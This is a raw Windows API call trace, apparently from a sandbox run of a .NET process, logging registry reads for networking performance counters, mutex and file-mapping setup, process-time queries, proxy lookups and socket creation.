	[0889.369] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x40c
	[0889.798] setsockopt (s=0x40c, level=65535, optname=128, optval="\x01", optlen=4) returned -1
	[0889.798] closesocket (s=0x40c) returned 0
	[0889.804] GetCurrentProcess () returned 0xffffffffffffffff
	[0889.804] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c5ed2f8 | out: TokenHandle=0x1c5ed2f8*=0x40c) returned 1
	[0889.817] GetCurrentProcess () returned 0xffffffffffffffff
	[0889.817] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c5ed2f8 | out: TokenHandle=0x1c5ed2f8*=0x410) returned 1
	[0889.839] GetCurrentProcessId () returned 0x9b8
	[0890.314] CoTaskMemAlloc (cb=0x204) returned 0x372590
	[0890.314] GetComputerNameW (in: lpBuffer=0x372590, nSize=0x2fc92e0 | out: lpBuffer="XDUWTFONO", nSize=0x2fc92e0) returned 1
	[0890.314] CoTaskMemFree (pv=0x372590) 
	[0890.315] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.NET CLR Networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c5ed7d8 | out: phkResult=0x1c5ed7d8*=0x414) returned 0x0
	[0890.315] RegQueryValueExW (in: hKey=0x414, lpValueName="Library", lpReserved=0x0, lpType=0x1c5ed75c, lpData=0x0, lpcbData=0x1c5ed758*=0x0 | out: lpType=0x1c5ed75c*=0x1, lpData=0x0, lpcbData=0x1c5ed758*=0x1c) returned 0x0
	[0890.316] CoTaskMemAlloc (cb=0x20) returned 0x28b1e30
	[0890.316] RegQueryValueExW (in: hKey=0x414, lpValueName="Library", lpReserved=0x0, lpType=0x1c5ed72c, lpData=0x28b1e30, lpcbData=0x1c5ed728*=0x1c | out: lpType=0x1c5ed72c*=0x1, lpData="netfxperf.dll", lpcbData=0x1c5ed728*=0x1c) returned 0x0
	[0890.316] CoTaskMemFree (pv=0x28b1e30) 
	[0890.316] RegQueryValueExW (in: hKey=0x414, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x1c5ed75c, lpData=0x0, lpcbData=0x1c5ed758*=0x0 | out: lpType=0x1c5ed75c*=0x4, lpData=0x0, lpcbData=0x1c5ed758*=0x4) returned 0x0
	[0890.317] RegQueryValueExW (in: hKey=0x414, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x1c5ed760, lpData=0x1c5ed75c, lpcbData=0x1c5ed758*=0x4 | out: lpType=0x1c5ed760*=0x4, lpData=0x1c5ed75c*=0x1, lpcbData=0x1c5ed758*=0x4) returned 0x0
	[0890.317] RegQueryValueExW (in: hKey=0x414, lpValueName="First Counter", lpReserved=0x0, lpType=0x1c5ed75c, lpData=0x0, lpcbData=0x1c5ed758*=0x0 | out: lpType=0x1c5ed75c*=0x4, lpData=0x0, lpcbData=0x1c5ed758*=0x4) returned 0x0
	[0890.317] RegQueryValueExW (in: hKey=0x414, lpValueName="First Counter", lpReserved=0x0, lpType=0x1c5ed760, lpData=0x1c5ed75c, lpcbData=0x1c5ed758*=0x4 | out: lpType=0x1c5ed760*=0x4, lpData=0x1c5ed75c*=0x137a, lpcbData=0x1c5ed758*=0x4) returned 0x0
	[0890.317] RegCloseKey (hKey=0x414) returned 0x0
	[0890.323] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.net clr networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c5ed798 | out: phkResult=0x1c5ed798*=0x414) returned 0x0
	[0890.323] RegQueryValueExW (in: hKey=0x414, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x1c5ed71c, lpData=0x0, lpcbData=0x1c5ed718*=0x0 | out: lpType=0x1c5ed71c*=0x4, lpData=0x0, lpcbData=0x1c5ed718*=0x4) returned 0x0
	[0890.323] RegQueryValueExW (in: hKey=0x414, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x1c5ed720, lpData=0x1c5ed71c, lpcbData=0x1c5ed718*=0x4 | out: lpType=0x1c5ed720*=0x4, lpData=0x1c5ed71c*=0x3, lpcbData=0x1c5ed718*=0x4) returned 0x0
	[0890.323] RegQueryValueExW (in: hKey=0x414, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x1c5ed71c, lpData=0x0, lpcbData=0x1c5ed718*=0x0 | out: lpType=0x1c5ed71c*=0x4, lpData=0x0, lpcbData=0x1c5ed718*=0x4) returned 0x0
	[0890.323] RegQueryValueExW (in: hKey=0x414, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x1c5ed720, lpData=0x1c5ed71c, lpcbData=0x1c5ed718*=0x4 | out: lpType=0x1c5ed720*=0x4, lpData=0x1c5ed71c*=0x20000, lpcbData=0x1c5ed718*=0x4) returned 0x0
	[0890.323] RegQueryValueExW (in: hKey=0x414, lpValueName="Counter Names", lpReserved=0x0, lpType=0x1c5ed71c, lpData=0x0, lpcbData=0x1c5ed718*=0x0 | out: lpType=0x1c5ed71c*=0x3, lpData=0x0, lpcbData=0x1c5ed718*=0xaa) returned 0x0
	[0890.323] RegQueryValueExW (in: hKey=0x414, lpValueName="Counter Names", lpReserved=0x0, lpType=0x1c5ed71c, lpData=0x2fcc5d0, lpcbData=0x1c5ed718*=0xaa | out: lpType=0x1c5ed71c*=0x3, lpData=0x2fcc5d0*, lpcbData=0x1c5ed718*=0xaa) returned 0x0
	[0890.327] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1
	[0890.331] CreateFileMappingW (hFile=0xffffffffffffffff, lpFileMappingAttributes=0x1c5ed6d0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x20000, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x0
	[0890.332] OpenFileMappingW (dwDesiredAccess=0x2, bInheritHandle=0, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x41c
	[0890.335] MapViewOfFile (hFileMappingObject=0x41c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x29a0000
	[0890.336] VirtualQuery (in: lpAddress=0x29a0000, lpBuffer=0x1c5ed6c8, dwLength=0x30 | out: lpBuffer=0x1c5ed6c8*(BaseAddress=0x29a0000, AllocationBase=0x29a0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x20000, State=0x1000, Protect=0x4, Type=0x40000, __alignment2=0x0)) returned 0x30
	[0890.336] LocalFree (hMem=0x32a420) returned 0x0
	[0890.337] RegCloseKey (hKey=0x414) returned 0x0
	[0890.339] GetVersionExW (in: lpVersionInformation=0x1c5ec6a0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1c5ec6a0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0890.340] GetVersionExW (in: lpVersionInformation=0x1c5ec670*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1c5ec670*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0890.342] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2fcd2a0, cbSid=0x1c5ed6b0 | out: pSid=0x2fcd2a0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c5ed6b0) returned 1
	[0890.891] CreateMutexW (lpMutexAttributes=0x2fcd4a8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x414
	[0890.894] WaitForSingleObject (hHandle=0x414, dwMilliseconds=0x1f4) returned 0x0
	[0890.895] GetCurrentProcessId () returned 0x9b8
	[0890.896] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9b8) returned 0x420
	[0890.897] GetProcessTimes (in: hProcess=0x420, lpCreationTime=0x1c5ed5c0, lpExitTime=0x1c5ed5b8, lpKernelTime=0x1c5ed5b0, lpUserTime=0x1c5ed5a8 | out: lpCreationTime=0x1c5ed5c0, lpExitTime=0x1c5ed5b8, lpKernelTime=0x1c5ed5b0, lpUserTime=0x1c5ed5a8) returned 1
	[0890.897] CloseHandle (hObject=0x420) returned 1
	[0890.898] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcb0) returned 0x420
	[0890.898] GetProcessTimes (in: hProcess=0x420, lpCreationTime=0x1c5ed650, lpExitTime=0x1c5ed648, lpKernelTime=0x1c5ed640, lpUserTime=0x1c5ed638 | out: lpCreationTime=0x1c5ed650, lpExitTime=0x1c5ed648, lpKernelTime=0x1c5ed640, lpUserTime=0x1c5ed638) returned 1
	[0890.898] CloseHandle (hObject=0x420) returned 1
	[0890.898] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xcb0) returned 0x420
	[0890.899] GetCurrentProcess () returned 0xffffffffffffffff
	[0890.899] GetCurrentProcess () returned 0xffffffffffffffff
	[0890.900] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x420, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c5ed5a8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c5ed5a8*=0x424) returned 1
	[0890.902] CloseHandle (hObject=0x424) returned 1
	[0890.902] CloseHandle (hObject=0x420) returned 1
	[0890.902] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf10) returned 0x420
	[0890.902] GetProcessTimes (in: hProcess=0x420, lpCreationTime=0x1c5ed650, lpExitTime=0x1c5ed648, lpKernelTime=0x1c5ed640, lpUserTime=0x1c5ed638 | out: lpCreationTime=0x1c5ed650, lpExitTime=0x1c5ed648, lpKernelTime=0x1c5ed640, lpUserTime=0x1c5ed638) returned 1
	[0890.902] CloseHandle (hObject=0x420) returned 1
	[0890.902] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf10) returned 0x420
	[0890.903] GetCurrentProcess () returned 0xffffffffffffffff
	[0890.903] GetCurrentProcess () returned 0xffffffffffffffff
	[0890.903] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x420, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c5ed5a8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c5ed5a8*=0x424) returned 1
	[0890.903] CloseHandle (hObject=0x424) returned 1
	[0890.904] CloseHandle (hObject=0x420) returned 1
	[0890.904] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf18) returned 0x420
	[0890.904] GetProcessTimes (in: hProcess=0x420, lpCreationTime=0x1c5ed650, lpExitTime=0x1c5ed648, lpKernelTime=0x1c5ed640, lpUserTime=0x1c5ed638 | out: lpCreationTime=0x1c5ed650, lpExitTime=0x1c5ed648, lpKernelTime=0x1c5ed640, lpUserTime=0x1c5ed638) returned 1
	[0890.904] CloseHandle (hObject=0x420) returned 1
	[0890.904] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf18) returned 0x420
	[0890.904] GetCurrentProcess () returned 0xffffffffffffffff
	[0890.904] GetCurrentProcess () returned 0xffffffffffffffff
	[0890.905] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x420, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c5ed5a8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c5ed5a8*=0x424) returned 1
	[0890.905] CloseHandle (hObject=0x424) returned 1
	[0890.905] CloseHandle (hObject=0x420) returned 1
	[0890.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf64) returned 0x420
	[0890.905] GetProcessTimes (in: hProcess=0x420, lpCreationTime=0x1c5ed650, lpExitTime=0x1c5ed648, lpKernelTime=0x1c5ed640, lpUserTime=0x1c5ed638 | out: lpCreationTime=0x1c5ed650, lpExitTime=0x1c5ed648, lpKernelTime=0x1c5ed640, lpUserTime=0x1c5ed638) returned 1
	[0890.905] CloseHandle (hObject=0x420) returned 1
	[0890.906] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf64) returned 0x420
	[0890.906] GetCurrentProcess () returned 0xffffffffffffffff
	[0890.906] GetCurrentProcess () returned 0xffffffffffffffff
	[0890.906] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x420, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c5ed5a8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c5ed5a8*=0x424) returned 1
	[0890.906] CloseHandle (hObject=0x424) returned 1
	[0890.906] CloseHandle (hObject=0x420) returned 1
	[0890.906] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf38) returned 0x420
	[0890.907] GetProcessTimes (in: hProcess=0x420, lpCreationTime=0x1c5ed650, lpExitTime=0x1c5ed648, lpKernelTime=0x1c5ed640, lpUserTime=0x1c5ed638 | out: lpCreationTime=0x1c5ed650, lpExitTime=0x1c5ed648, lpKernelTime=0x1c5ed640, lpUserTime=0x1c5ed638) returned 1
	[0890.907] CloseHandle (hObject=0x420) returned 1
	[0890.907] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf38) returned 0x420
	[0890.907] GetCurrentProcess () returned 0xffffffffffffffff
	[0890.907] GetCurrentProcess () returned 0xffffffffffffffff
	[0890.907] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x420, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c5ed5a8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c5ed5a8*=0x424) returned 1
	[0890.907] CloseHandle (hObject=0x424) returned 1
	[0890.908] CloseHandle (hObject=0x420) returned 1
	[0890.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf6c) returned 0x420
	[0890.908] GetProcessTimes (in: hProcess=0x420, lpCreationTime=0x1c5ed650, lpExitTime=0x1c5ed648, lpKernelTime=0x1c5ed640, lpUserTime=0x1c5ed638 | out: lpCreationTime=0x1c5ed650, lpExitTime=0x1c5ed648, lpKernelTime=0x1c5ed640, lpUserTime=0x1c5ed638) returned 1
	[0890.908] CloseHandle (hObject=0x420) returned 1
	[0890.908] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf6c) returned 0x420
	[0890.908] GetCurrentProcess () returned 0xffffffffffffffff
	[0890.908] GetCurrentProcess () returned 0xffffffffffffffff
	[0890.908] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x420, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c5ed5a8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c5ed5a8*=0x424) returned 1
	[0890.909] CloseHandle (hObject=0x424) returned 1
	[0890.909] CloseHandle (hObject=0x420) returned 1
	[0890.909] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf54) returned 0x420
	[0890.909] GetProcessTimes (in: hProcess=0x420, lpCreationTime=0x1c5ed650, lpExitTime=0x1c5ed648, lpKernelTime=0x1c5ed640, lpUserTime=0x1c5ed638 | out: lpCreationTime=0x1c5ed650, lpExitTime=0x1c5ed648, lpKernelTime=0x1c5ed640, lpUserTime=0x1c5ed638) returned 1
	[0890.909] CloseHandle (hObject=0x420) returned 1
	[0890.909] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf54) returned 0x420
	[0890.909] GetCurrentProcess () returned 0xffffffffffffffff
	[0890.910] GetCurrentProcess () returned 0xffffffffffffffff
	[0890.910] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x420, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c5ed5a8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c5ed5a8*=0x424) returned 1
	[0890.910] CloseHandle (hObject=0x424) returned 1
	[0890.910] CloseHandle (hObject=0x420) returned 1
	[0890.912] ReleaseMutex (hMutex=0x414) returned 1
	[0890.912] CloseHandle (hObject=0x414) returned 1
	[0890.912] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2fce6a8, cbSid=0x1c5ed6b0 | out: pSid=0x2fce6a8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c5ed6b0) returned 1
	[0890.913] CreateMutexW (lpMutexAttributes=0x2fce860, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x414
	[0890.913] WaitForSingleObject (hHandle=0x414, dwMilliseconds=0x1f4) returned 0x0
	[0890.914] ReleaseMutex (hMutex=0x414) returned 1
	[0890.914] CloseHandle (hObject=0x414) returned 1
	[0890.914] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2fcf4d0, cbSid=0x1c5ed6b0 | out: pSid=0x2fcf4d0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c5ed6b0) returned 1
	[0890.914] CreateMutexW (lpMutexAttributes=0x2fcf688, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x414
	[0890.915] WaitForSingleObject (hHandle=0x414, dwMilliseconds=0x1f4) returned 0x0
	[0890.915] ReleaseMutex (hMutex=0x414) returned 1
	[0890.915] CloseHandle (hObject=0x414) returned 1
	[0890.916] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2fd0308, cbSid=0x1c5ed6b0 | out: pSid=0x2fd0308*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c5ed6b0) returned 1
	[0890.916] CreateMutexW (lpMutexAttributes=0x2fd04c0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x414
	[0890.916] WaitForSingleObject (hHandle=0x414, dwMilliseconds=0x1f4) returned 0x0
	[0890.917] ReleaseMutex (hMutex=0x414) returned 1
	[0890.917] CloseHandle (hObject=0x414) returned 1
	[0890.917] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2fd1138, cbSid=0x1c5ed6b0 | out: pSid=0x2fd1138*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c5ed6b0) returned 1
	[0890.918] CreateMutexW (lpMutexAttributes=0x2fd12f0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x414
	[0890.918] WaitForSingleObject (hHandle=0x414, dwMilliseconds=0x1f4) returned 0x0
	[0890.918] ReleaseMutex (hMutex=0x414) returned 1
	[0890.919] CloseHandle (hObject=0x414) returned 1
	[0890.921] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2fd1f68, cbSid=0x1c5ed660 | out: pSid=0x2fd1f68*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c5ed660) returned 1
	[0890.921] CreateMutexW (lpMutexAttributes=0x2fd2120, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x414
	[0890.922] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2fd2d88, cbSid=0x1c5ed660 | out: pSid=0x2fd2d88*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c5ed660) returned 1
	[0890.922] CreateMutexW (lpMutexAttributes=0x2fd2f40, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x414
	[0890.922] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2fd3ba0, cbSid=0x1c5ed660 | out: pSid=0x2fd3ba0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c5ed660) returned 1
	[0890.922] CreateMutexW (lpMutexAttributes=0x2fd3d58, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x414
	[0890.922] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2fd49c8, cbSid=0x1c5ed660 | out: pSid=0x2fd49c8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c5ed660) returned 1
	[0890.923] CreateMutexW (lpMutexAttributes=0x2fd4b80, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x414
	[0890.923] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2fd57e8, cbSid=0x1c5ed660 | out: pSid=0x2fd57e8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c5ed660) returned 1
	[0890.923] CreateMutexW (lpMutexAttributes=0x2fd59a0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x414
	[0890.924] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x420
	[0890.925] ioctlsocket (in: s=0x414, cmd=-2147195266, argp=0x1c5edc98 | out: argp=0x1c5edc98) returned 0
	[0890.925] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x424
	[0890.925] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x428
	[0890.925] ioctlsocket (in: s=0x424, cmd=-2147195266, argp=0x1c5edc98 | out: argp=0x1c5edc98) returned 0
	[0890.926] WSAIoctl (in: s=0x414, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c5edc10, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c5edc10, lpOverlapped=0x0) returned -1
	[0890.927] CoTaskMemAlloc (cb=0x204) returned 0x372380
	[0890.927] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x372380, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0890.927] CoTaskMemFree (pv=0x372380) 
	[0890.928] WSAEventSelect (s=0x414, hEventObject=0x420, lNetworkEvents=512) returned 0
	[0890.928] WSAIoctl (in: s=0x424, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c5edc10, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c5edc10, lpOverlapped=0x0) returned -1
	[0890.929] CoTaskMemAlloc (cb=0x204) returned 0x372380
	[0890.929] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x372380, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0890.929] CoTaskMemFree (pv=0x372380) 
	[0890.929] WSAEventSelect (s=0x424, hEventObject=0x428, lNetworkEvents=512) returned 0
	[0890.929] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x42c
	[0890.930] RasConnectionNotificationW (param_1=0xffffffffffffffff, param_2=0x42c, param_3=0x3) returned 0x0
	[0891.423] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x1c5edd50 | out: phkResult=0x1c5edd50*=0x444) returned 0x0
	[0891.425] RegOpenKeyExW (in: hKey=0x444, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c5edc38 | out: phkResult=0x1c5edc38*=0x448) returned 0x0
	[0891.425] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x44c
	[0891.426] RegNotifyChangeKeyValue (hKey=0x448, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x44c, fAsynchronous=1) returned 0x0
	[0891.427] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c5edc60 | out: phkResult=0x1c5edc60*=0x450) returned 0x0
	[0891.427] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x454
	[0891.427] RegNotifyChangeKeyValue (hKey=0x450, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x454, fAsynchronous=1) returned 0x0
	[0891.427] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c5edc60 | out: phkResult=0x1c5edc60*=0x458) returned 0x0
	[0891.427] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x45c
	[0891.427] RegNotifyChangeKeyValue (hKey=0x458, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x45c, fAsynchronous=1) returned 0x0
	[0891.427] GetCurrentProcess () returned 0xffffffffffffffff
	[0891.428] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c5edbc8 | out: TokenHandle=0x1c5edbc8*=0x460) returned 1
	[0897.307] GetCurrentProcess () returned 0xffffffffffffffff
	[0897.307] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c5ed398 | out: TokenHandle=0x1c5ed398*=0x380) returned 1
	[0897.312] GetCurrentProcess () returned 0xffffffffffffffff
	[0897.312] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c5ed398 | out: TokenHandle=0x1c5ed398*=0x384) returned 1
	[0897.324] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x1c5edc98 | out: pProxyConfig=0x1c5edc98) returned 1
	[0899.554] SetEvent (hEvent=0x394) returned 1
	[0900.248] GetCurrentProcess () returned 0xffffffffffffffff
	[0900.248] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c5ed408 | out: TokenHandle=0x1c5ed408*=0x480) returned 1
	[0900.252] GetCurrentProcess () returned 0xffffffffffffffff
	[0900.252] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c5ed408 | out: TokenHandle=0x1c5ed408*=0x484) returned 1
	[0900.253] SetEvent (hEvent=0x394) returned 1
	[0900.943] GetNetworkParams (in: pFixedInfo=0x0, pOutBufLen=0x1c5ed8d8 | out: pFixedInfo=0x0, pOutBufLen=0x1c5ed8d8) returned 0x6f
	[0900.968] LocalAlloc (uFlags=0x0, uBytes=0x258) returned 0x28d2010
	[0900.968] GetNetworkParams (in: pFixedInfo=0x28d2010, pOutBufLen=0x1c5ed8d8 | out: pFixedInfo=0x28d2010, pOutBufLen=0x1c5ed8d8) returned 0x0
	[0901.815] CoTaskMemAlloc (cb=0xd) returned 0x32b510
	[0901.815] inet_addr (cp="192.168.0.1") returned 0x100a8c0
	[0901.815] CoTaskMemFree (pv=0x32b510) 
	[0901.818] LocalFree (hMem=0x28d2010) returned 0x0
	[0901.832] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x498
	[0901.833] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x494
	[0901.835] CoTaskMemAlloc (cb=0x10) returned 0x32b510
